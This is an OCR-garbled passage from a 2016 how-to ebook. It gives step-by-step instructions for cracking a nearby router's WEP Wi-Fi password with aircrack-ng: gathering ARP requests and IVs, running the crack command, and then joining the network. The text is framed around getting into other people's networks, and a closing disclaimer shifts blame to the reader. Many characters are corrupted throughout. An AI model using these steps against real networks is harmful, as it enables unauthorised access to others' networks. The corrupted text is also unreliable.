gathering a bunch of packets and waiting on !7P and !5. Don*t worry about what

these mean(ust know that these are your meal tickets. Now you (ust sit and wait.

1nce your computer finally gathers an !7P re8uest, it will send it back to the router

and begin to generate hundreds of !7P and !5 per second. ometimes this startsto happen within secondssometimes you have to wait up to a few minutes. ust be

patient. hen it finally does happen, switch back to your first 5onsole window and

 you should see the number underneath the # starting to rise rapidly. %his is great+ #t

means you are almost finished+ hen this number reaches !% &6!% G,=== then

 you can start your password crack. #t will probably take more than this but # always

start my password cracking at G,=== (ust in case they have a really weak password.

Now you need to open up a 2rd and final 5onsole window. %his will be where we

actually crack the password.Now type/

aircrack-ng -b 9bssid: 9filename:-=;.cap

7emember the file name you made up earlierJ )ine was @BenA. Don*t put a space in

 between it and -=;.cap here. %ype it as you see it. o for me, # would type wepkey-


1nce you have done this you will see aircrack fire up and begin to crack the

password. typically you have to wait for more like ;=,=== to >=,=== #*s before it will

crack. #f this is the case, aircrack will test what you*ve got so far and then it will say

something like @not enough #*s. 7etry at ;=,===.A

copyright © 2016 EAPL 65

D1N*% D1 !N%H#N<+ #t will stay runningit is (ust letting you know that it is on

pause until more #*s are gathered. 1nce you pass the ;=,=== mark it will

automatically fire up again and try to crack it. #f this fails it will say @not enough #*s.

7etry at ;G,===.A and so on until it finally gets it.

#f you do everything correctly up to this point, before too long you will have thepassword+ now if the password looks goofy, dont worry, it will still work. some

passwords are saved in !## format, in which case, aircrack will show you e"actly

 what characters they typed in for their password. ometimes, though, the password

is saved in H6I format in which case the computer will show you the H6I

encryption of the password. #t doesn*t matter either way, because you can type in

either one and it will connect you to the network.

%ake note, though, that the password will always be displayed in aircrack with a

colon after every > characters. o for instance if the password was @secretA, it would

 be displayed as/


%his would obviously be the !## format. #f it was a H6I encrypted password that

 was something like @='5XE>O'A then it would still display as/


copyright © 2016 EAPL 66

ust omit the colons from the password, boot back into whatever operating system

 you use, try to connect to the network and type in the password without the colons

and presto+ ou are in+

#t may seem like a lot to deal with if you have never done it, but after a few successful

attempts, you will get very 8uick with it. #f # am near a 6P encrypted router with a

good signal, # can often crack the password in (ust a couple of minutes.

# am not responsible for what you do with this information. !ny maliciousFillegal

activity that you do, falls completely on you becausetechnicallythis is (ust for you

to test the security of your own network.

# hope you all liked it. #f you have any 8ueries then ask me.